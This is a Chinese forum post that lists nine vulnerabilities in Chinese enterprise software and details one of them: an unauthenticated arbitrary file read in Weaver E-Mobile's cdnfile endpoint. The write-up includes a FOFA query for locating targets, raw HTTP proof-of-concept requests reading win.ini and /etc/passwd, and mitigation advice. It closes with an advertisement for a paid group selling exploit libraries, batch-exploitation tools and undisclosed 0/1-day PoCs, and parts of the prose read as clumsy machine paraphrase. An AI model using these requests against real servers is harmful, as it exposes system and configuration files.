|
今日星球新增漏洞9个(优惠券二维码已更新,日前仅剩2个余额)
灵当CRM marketing index.php接囗存在SQL注入漏洞
魅思-视频管理系统 getOrderStatus接囗处存在SQL注入漏洞
商混ERP系统 TaskCarToQueue.aspx接囗存在SQL注入漏洞
数字通云平台智慧政务 workflow query index接囗存在SQL注入漏洞
万能小程序运营管理系统 requestPost接囗存在任意文件读取漏洞
用友U8 CRM config relobjreportlist.php接囗存在SQL注入漏洞
誉龙视音频综合管理平台 RelMedia FindByld接囗存在SQL注入漏洞
誉龙视音频综合管理平台 Third TimeSyn接口存在远程命令执行漏洞
泛微E-Mobile client cdnfile接囗存在任意文件读取漏洞
0x01 制品简介
泛微E-Mobile是一款由泛微网络科技股份有限机构研发的移动办公制品,该制品专门为手机、平板电脑等移动终端用户设计,旨在供给方便、有效的移动办公体验。适用于企业高管和有移动办公需要的业务部关联员工运用,尤其适合于已有内部OA系统的大中型企业公司,尤其是企业或分部有较多的分支公司。近期推出的鸿蒙原生应用基线版本就实现了跨设备联动、应用接续等创新功能,为用户带来更加有效、方便的移动办公体验。将来,泛微E-Mobile将继续引领数字化办公浪潮,为更加多企业供给优秀的移动办公处理方法。
0x02 漏洞概述
泛微E-Mobile cientcdnle 接口存在任意文件读取漏洞,未经身份验证攻击者可经过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,引起网站处在极度不安全状态。
0x03 复现环境
FOFA: app="泛微-EMobile"
0x04 漏洞复现
Windows-PoC GET /client/cdnfile/1C/Windows/win.ini?windows HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Connection: close
Linux-POC GET /client/cdnfile/C/etc/passwd?linuxHTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Connection: close
0x05 修复意见
临时缓解方法
接口设置拜访权限或限制拜访源自位置,如非必要,不要将系统开放在互联网上。
升级修复方法
日前官方已发布安全补丁,意见受影响用户尽快升级至安全版本
https://www.weaver.com.cn
0x06 星球介绍
本星球不割韭菜,不发烂大街东西。欢迎进来白嫖,不满意三天退款;
本星球保持每日分享有些攻防知识,包含攻防技术、网络安全漏洞预警脚本、网络安全渗透测试工具、处理方法、安全运营、安全体系、安全培训和安全标准等文库;
本星主已加入几十余个付费星球,定时汇聚高质量资料及工具进行星球分享。
0x07 星球服务 1.咱们将保证会员能够接触到至少365个独特的漏洞利用程序库和相应的批量利用工具,保证您能够应对各类安全挑战;2.Cmd5解密服务,持续更新的多种漏洞利用工具以及安全渗透工具和文档资源将与您共享,帮忙您保持领先地位;3.把握独家的漏洞数据库情报(超过2000个Poc),包含定时更新的未公开0/1day漏洞信息,保证您在信息安全领域保持一步之遥。加入花费原价为50元,前十名加入前可领取20元优惠券。机会难得,相当于结交伴侣的价格!同期加入之后需要那些漏洞能够跟星主提,这边随时给您供给相应的帮忙。重视,一旦成员数目达到10人,入会花费将调节至80元。咱们承诺圈子的内容将保持每日更新,保证您获取最新的信息安全动态和专业知识。
星主部分POC
| 
发表于 2024-10-3 07:04:30
楼主